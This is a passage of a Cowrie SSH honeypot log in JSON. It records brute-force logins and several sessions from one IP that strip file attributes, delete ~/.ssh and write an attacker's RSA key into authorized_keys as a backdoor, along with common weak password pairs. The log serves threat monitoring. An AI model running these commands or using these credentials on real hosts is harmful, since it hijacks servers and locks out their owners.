0\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x84\\xa0\\x8d$K\\xc9%\\xde2 #\\xcb(\\xfa\\x12\\xe5\\t\\xa2'\\xb9JX\\x17\\xc2\\t\\xa7;[\\x85F\\xbfA \\x17\\x8f\\x7f+ig\\xfdH\\x95+\\xfd\\xe27\\xaa\\x1eu\\x1f\\xd7\\xe5\\xf1\\xfb\\x07\\x15E@2\\xab\\x18\\xfd\\xc7\\xaa\\xbf\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x86\\x91c\\xfdP%|\\xa0\\xe2)\\xfa<?\\x95U\\xe6\\x12g\\xf0\\xcd\\xee 0\\xd4p\\x0b\\xa8\\xacdP\\x0b\\x13\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T10:33:04.194141Z","src_ip":"194.0.234.21","session":"4e8ebcbc021b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:33:04.268152Z","src_ip":"194.0.234.21","session":"4e8ebcbc021b"}
{"eventid":"cowrie.login.success","username":"root","password":"ghbdtn","message":"login attempt [root/ghbdtn] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:33:04.747588Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:33:05.197335Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:33:05.198134Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:33:05.199393Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:33:05.413786Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:33:05.951266Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:33:05.952040Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:33:06.167635Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:33:06.168698Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32870,"dst_ip":"1.2.3.4","dst_port":22,"session":"728feebd96e9","protocol":"ssh","message":"New connection: 212.227.235.229:32870 (1.2.3.4:22) [session: 728feebd96e9]","sensor":"my-vps","timestamp":"2025-08-26T10:33:06.370193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:33:06.371711Z","src_ip":"212.227.235.229","session":"728feebd96e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:33:06.578637Z","src_ip":"212.227.235.229","session":"728feebd96e9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:33:07.409361Z","src_ip":"212.227.235.229","session":"728feebd96e9"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:33:08.618653Z","src_ip":"212.227.235.229","session":"728feebd96e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32874,"dst_ip":"1.2.3.4","dst_port":22,"session":"02704626d496","protocol":"ssh","message":"New connection: 212.227.235.229:32874 (1.2.3.4:22) [session: 02704626d496]","sensor":"my-vps","timestamp":"2025-08-26T10:33:08.837318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:33:08.838427Z","src_ip":"212.227.235.229","session":"02704626d496"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:33:09.053162Z","src_ip":"212.227.235.229","session":"02704626d496"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:33:09.951663Z","src_ip":"212.227.235.229","session":"02704626d496"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:33:10.167995Z","src_ip":"212.227.235.229","session":"5b8f9f1001bd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:33:10.169189Z","src_ip":"212.227.235.229","session":"02704626d496"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39876,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9849e44c2c1","protocol":"ssh","message":"New connection: 196.251.86.249:39876 (1.2.3.4:22) [session: e9849e44c2c1]","sensor":"my-vps","timestamp":"2025-08-26T10:33:36.950266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:33:37.553529Z","src_ip":"196.251.86.249","session":"e9849e44c2c1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:33:37.554265Z","src_ip":"196.251.86.249","session":"e9849e44c2c1"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwerty123","message":"login attempt [oracle/qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:33:39.729843Z","src_ip":"196.251.86.249","session":"e9849e44c2c1"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:33:41.307333Z","src_ip":"196.251.86.249","session":"e9849e44c2c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34988,"dst_ip":"1.2.3.4","dst_port":22,"session":"12fb566e4d6a","protocol":"ssh","message":"New connection: 212.227.235.229:34988 (1.2.3.4:22) [session: 12fb566e4d6a]","sensor":"my-vps","timestamp":"2025-08-26T10:33:59.644280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:33:59.647110Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:33:59.885304Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.login.success","username":"root","password":"1QAZ1qaz","message":"login attempt [root/1QAZ1qaz] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:34:00.852561Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:34:01.361674Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:34:01.363340Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:34:01.364689Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:01.609698Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:34:02.208158Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:34:02.208841Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:34:02.458737Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:02.459752Z","src_ip":"212.227.235.229","session":"12fb566e4d6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36102,"dst_ip":"1.2.3.4","dst_port":22,"session":"a336f30283f8","protocol":"ssh","message":"New connection: 212.227.235.229:36102 (1.2.3.4:22) [session: a336f30283f8]","sensor":"my-vps","timestamp":"2025-08-26T10:34:02.704648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:34:02.711237Z","src_ip":"212.227.235.229","session":"a336f30283f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:34:02.958407Z","src_ip":"212.227.235.229","session":"a336f30283f8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:34:03.953205Z","src_ip":"212.227.235.229","session":"a336f30283f8"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:05.205507Z","src_ip":"212.227.235.229","session":"a336f30283f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36108,"dst_ip":"1.2.3.4","dst_port":22,"session":"469003027213","protocol":"ssh","message":"New connection: 212.227.235.229:36108 (1.2.3.4:22) [session: 469003027213]","sensor":"my-vps","timestamp":"2025-08-26T10:34:05.449190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:34:05.449900Z","src_ip":"212.227.235.229","session":"469003027213"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes1